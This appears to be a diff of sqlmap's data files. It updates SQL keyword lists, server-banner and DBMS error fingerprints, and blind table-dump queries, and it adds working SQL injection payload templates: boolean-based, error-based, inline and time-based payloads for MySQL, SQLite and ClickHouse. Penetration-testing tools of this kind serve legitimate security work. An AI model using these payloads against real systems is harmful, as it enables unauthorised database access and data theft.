ROLLUP
|
||||
ROTATE
|
||||
ROUTINE
|
||||
ROW
|
||||
ROWS
|
||||
ROW_COUNT
|
||||
ROW_FORMAT
|
||||
ROW_NUMBER
|
||||
RTREE
|
||||
SAVEPOINT
|
||||
SCHEDULE
|
||||
SCHEMA
|
||||
SCHEMAS
|
||||
SCHEMA_NAME
|
||||
SECOND
|
||||
SECONDARY
|
||||
SECONDARY_ENGINE
|
||||
SECONDARY_ENGINE_ATTRIBUTE
|
||||
SECONDARY_LOAD
|
||||
SECONDARY_UNLOAD
|
||||
SECOND_MICROSECOND
|
||||
SECURITY
|
||||
SELECT
|
||||
SENSITIVE
|
||||
SEPARATOR
|
||||
SERIAL
|
||||
SERIALIZABLE
|
||||
SERVER
|
||||
SESSION
|
||||
SET
|
||||
SHARE
|
||||
SHOW
|
||||
SHUTDOWN
|
||||
SIGNAL
|
||||
SIGNED
|
||||
SIMPLE
|
||||
SKIP
|
||||
SLAVE
|
||||
SLOW
|
||||
SMALLINT
|
||||
SNAPSHOT
|
||||
SOCKET
|
||||
SOME
|
||||
SONAME
|
||||
SOUNDS
|
||||
SOURCE
|
||||
SOURCE_AUTO_POSITION
|
||||
SOURCE_BIND
|
||||
SOURCE_COMPRESSION_ALGORITHMS
|
||||
SOURCE_CONNECT_RETRY
|
||||
SOURCE_DELAY
|
||||
SOURCE_HEARTBEAT_PERIOD
|
||||
SOURCE_HOST
|
||||
SOURCE_LOG_FILE
|
||||
SOURCE_LOG_POS
|
||||
SOURCE_PASSWORD
|
||||
SOURCE_PORT
|
||||
SOURCE_PUBLIC_KEY_PATH
|
||||
SOURCE_RETRY_COUNT
|
||||
SOURCE_SSL
|
||||
SOURCE_SSL_CA
|
||||
SOURCE_SSL_CAPATH
|
||||
SOURCE_SSL_CERT
|
||||
SOURCE_SSL_CIPHER
|
||||
SOURCE_SSL_CRL
|
||||
SOURCE_SSL_CRLPATH
|
||||
SOURCE_SSL_KEY
|
||||
SOURCE_SSL_VERIFY_SERVER_CERT
|
||||
SOURCE_TLS_CIPHERSUITES
|
||||
SOURCE_TLS_VERSION
|
||||
SOURCE_USER
|
||||
SOURCE_ZSTD_COMPRESSION_LEVEL
|
||||
SPATIAL
|
||||
SPECIFIC
|
||||
SQL
|
||||
SQLEXCEPTION
|
||||
SQLSTATE
|
||||
SQLWARNING
|
||||
SQL_AFTER_GTIDS
|
||||
SQL_AFTER_MTS_GAPS
|
||||
SQL_BEFORE_GTIDS
|
||||
SQL_BIG_RESULT
|
||||
SQL_BUFFER_RESULT
|
||||
SQL_CACHE
|
||||
SQL_CALC_FOUND_ROWS
|
||||
SQL_NO_CACHE
|
||||
SQL_SMALL_RESULT
|
||||
SQL_THREAD
|
||||
SQL_TSI_DAY
|
||||
SQL_TSI_HOUR
|
||||
SQL_TSI_MINUTE
|
||||
SQL_TSI_MONTH
|
||||
SQL_TSI_QUARTER
|
||||
SQL_TSI_SECOND
|
||||
SQL_TSI_WEEK
|
||||
SQL_TSI_YEAR
|
||||
SRID
|
||||
SSL
|
||||
STACKED
|
||||
START
|
||||
STARTING
|
||||
STARTS
|
||||
STATS_AUTO_RECALC
|
||||
STATS_PERSISTENT
|
||||
STATS_SAMPLE_PAGES
|
||||
STATUS
|
||||
STOP
|
||||
STORAGE
|
||||
STORED
|
||||
STRAIGHT_JOIN
|
||||
STREAM
|
||||
STRING
|
||||
SUBCLASS_ORIGIN
|
||||
SUBJECT
|
||||
SUBPARTITION
|
||||
SUBPARTITIONS
|
||||
SUPER
|
||||
SUSPEND
|
||||
SWAPS
|
||||
SWITCHES
|
||||
SYSTEM
|
||||
TABLE
|
||||
TABLES
|
||||
TABLESPACE
|
||||
TABLE_CHECKSUM
|
||||
TABLE_NAME
|
||||
TEMPORARY
|
||||
TEMPTABLE
|
||||
TERMINATED
|
||||
TEXT
|
||||
THAN
|
||||
THEN
|
||||
THREAD_PRIORITY
|
||||
TIES
|
||||
TIME
|
||||
TIMESTAMP
|
||||
TIMESTAMPADD
|
||||
TIMESTAMPDIFF
|
||||
TINYBLOB
|
||||
TINYINT
|
||||
TINYTEXT
|
||||
TLS
|
||||
TO
|
||||
TRAILING
|
||||
TRANSACTION
|
||||
TRIGGER
|
||||
TRIGGERS
|
||||
TRUE
|
||||
TRUNCATE
|
||||
TYPE
|
||||
TYPES
|
||||
UNBOUNDED
|
||||
UNCOMMITTED
|
||||
UNDEFINED
|
||||
UNDO
|
||||
UNDOFILE
|
||||
UNDO_BUFFER_SIZE
|
||||
UNICODE
|
||||
UNINSTALL
|
||||
UNION
|
||||
UNIQUE
|
||||
UNKNOWN
|
||||
UNLOCK
|
||||
UNREGISTER
|
||||
UNSIGNED
|
||||
UNTIL
|
||||
UPDATE
|
||||
UPGRADE
|
||||
URL
|
||||
USAGE
|
||||
USE
|
||||
USER
|
||||
USER_RESOURCES
|
||||
USE_FRM
|
||||
USING
|
||||
UTC_DATE
|
||||
UTC_TIME
|
||||
UTC_TIMESTAMP
|
||||
VALIDATION
|
||||
VALUE
|
||||
VALUES
|
||||
VARBINARY
|
||||
VARCHAR
|
||||
VARCHARACTER
|
||||
VARIABLES
|
||||
VARYING
|
||||
VCPU
|
||||
VIEW
|
||||
VIRTUAL
|
||||
VISIBLE
|
||||
WAIT
|
||||
WARNINGS
|
||||
WEEK
|
||||
WEIGHT_STRING
|
||||
WHEN
|
||||
WHERE
|
||||
WHILE
|
||||
WINDOW
|
||||
WITH
|
||||
WITHOUT
|
||||
WORK
|
||||
WRAPPER
|
||||
WRITE
|
||||
X509
|
||||
XA
|
||||
XID
|
||||
XML
|
||||
XOR
|
||||
YEAR
|
||||
YEAR_MONTH
|
||||
ZEROFILL
|
||||
ZONE
|
||||
|
||||
# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html)
|
||||
|
||||
ABS
|
||||
@@ -872,3 +1628,8 @@ XMLTABLE
|
||||
XMLTEXT
|
||||
XMLVALIDATE
|
||||
YEAR
|
||||
|
||||
# Misc
|
||||
|
||||
ORD
|
||||
MID
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# Opera
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -34,7 +34,7 @@
|
||||
<!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
|
||||
|
||||
<regexp value="Windows.*\b10\.0">
|
||||
<info type="Windows" distrib="2016|2019|10|11"/>
|
||||
<info type="Windows" distrib="2016|2019|2022|10|11"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Windows.*\b6\.3">
|
||||
|
||||
@@ -3,14 +3,14 @@
|
||||
<!--
|
||||
References:
|
||||
* https://en.wikipedia.org/wiki/Internet_Information_Services
|
||||
* http://distrowatch.com
|
||||
* https://distrowatch.com
|
||||
-->
|
||||
|
||||
<root>
|
||||
<!-- Microsoft IIS -->
|
||||
|
||||
<regexp value="Microsoft-IIS/(10\.0)">
|
||||
<info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2019|2016|10"/>
|
||||
<info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2016|2019|2022|10|11"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft-IIS/(8\.5)">
|
||||
@@ -97,6 +97,10 @@
|
||||
<info type="Linux" distrib="CentOS" release="8"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Apache/2\.4\.48 \(CentOS\)">
|
||||
<info type="Linux" distrib="CentOS" release="9"/>
|
||||
</regexp>
|
||||
|
||||
<!-- Apache: Debian -->
|
||||
|
||||
<regexp value="Apache/1\.0\.5 \(Unix\) Debian/GNU">
|
||||
@@ -444,8 +448,12 @@
|
||||
<info type="FreeBSD" release="11.3"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Apache/2\.4\.51 \(FreeBSD\)">
|
||||
<info type="FreeBSD" release="12.3"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Apache/2\.4\.46 \(FreeBSD\)">
|
||||
<info type="FreeBSD" release="12.2"/>
|
||||
<info type="FreeBSD" release="13.0"/>
|
||||
</regexp>
|
||||
|
||||
<!-- Apache: Mandrake / Mandriva -->
|
||||
@@ -764,7 +772,7 @@
|
||||
</regexp>
|
||||
|
||||
<regexp value="Apache/2\.4\.43 \(Linux/SuSE\)">
|
||||
<info type="Linux" distrib="SuSE" release="15.2"/>
|
||||
<info type="Linux" distrib="SuSE" release="15.3"/>
|
||||
</regexp>
|
||||
|
||||
<!-- Apache: Ubuntu -->
|
||||
@@ -869,6 +877,14 @@
|
||||
<info type="Linux" distrib="Ubuntu" release="19.10|20.04|20.10" codename="eoan|focal"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Apache/2\.4\.46 \(Ubuntu\)">
|
||||
<info type="Linux" distrib="Ubuntu" release="21.04|21.10" codename="hirsute|impish"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Apache/2\.4\.52 \(Ubuntu\)">
|
||||
<info type="Linux" distrib="Ubuntu" release="22.04" codename="jammy"/>
|
||||
</regexp>
|
||||
|
||||
<!-- Nginx -->
|
||||
|
||||
<regexp value="nginx$">
|
||||
|
||||
@@ -199,6 +199,7 @@
|
||||
<error regexp="io\.prestosql\.jdbc"/>
|
||||
<error regexp="com\.simba\.presto\.jdbc"/>
|
||||
<error regexp="UNION query has different number of fields: \d+, \d+"/>
|
||||
<error regexp="line \d+:\d+: mismatched input '[^']+'. Expecting:"/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="Altibase">
|
||||
@@ -210,6 +211,11 @@
|
||||
<error regexp="Syntax error,[^\n]+assumed to mean"/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="ClickHouse">
|
||||
<error regexp="Code: \d+. DB::Exception:"/>
|
||||
<error regexp="Syntax error: failed at position \d+"/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="CrateDB">
|
||||
<error regexp="io\.crate\.client\.jdbc"/>
|
||||
</dbms>
|
||||
|
||||
@@ -484,18 +484,18 @@ Tag: <test>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
|
||||
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
|
||||
<stype>1</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>1</where>
|
||||
<vector>AND ([INFERENCE])*[RANDNUM]</vector>
|
||||
<vector>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
|
||||
<request>
|
||||
<payload>AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
|
||||
<payload>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
|
||||
<comparison>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
@@ -503,18 +503,18 @@ Tag: <test>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
|
||||
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
|
||||
<stype>1</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>2</where>
|
||||
<vector>OR ([INFERENCE])*[RANDNUM]</vector>
|
||||
<vector>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
|
||||
<request>
|
||||
<payload>OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
|
||||
<payload>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
|
||||
<comparison>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
@@ -596,6 +596,45 @@ Tag: <test>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
|
||||
<stype>1</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
|
||||
<request>
|
||||
<payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SQLite</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
|
||||
<request>
|
||||
<payload>OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SQLite</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!-- End of boolean-based blind tests - WHERE or HAVING clause -->
|
||||
|
||||
<!-- Boolean-based blind tests - Parameter replace -->
|
||||
|
||||
@@ -838,7 +838,7 @@
|
||||
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
@@ -853,6 +853,44 @@
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!--
|
||||
TODO: if possible, add payload for SQLite, Microsoft Access,
|
||||
and SAP MaxDB - no known techniques at this time
|
||||
|
||||
@@ -133,5 +133,25 @@
|
||||
<dbms>Firebird</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse inline queries</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>3</where>
|
||||
<vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!-- End of inline queries tests -->
|
||||
</root>
|
||||
|
||||
@@ -195,9 +195,9 @@
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,8,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
@@ -235,9 +235,9 @@
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
@@ -276,9 +276,9 @@
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
@@ -318,9 +318,9 @@
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
@@ -1494,6 +1494,44 @@
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse AND time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse OR time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!-- End of time-based boolean tests -->
|
||||
|
||||
<!-- Time-based boolean tests - Numerous clauses -->
|
||||
@@ -1607,10 +1645,10 @@
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<where>3</where>
|
||||
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
@@ -1880,7 +1918,7 @@
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
|
||||
@@ -1900,7 +1938,7 @@
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
|
||||
|
||||
@@ -207,7 +207,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS CAP FROM %s)x WHERE CAP=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
|
||||
@@ -228,7 +228,7 @@
|
||||
<length query="LENGTH(%s)"/>
|
||||
<isnull query="NVL(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||
<limit query="ROWNUM AS CAP %s) WHERE CAP"/>
|
||||
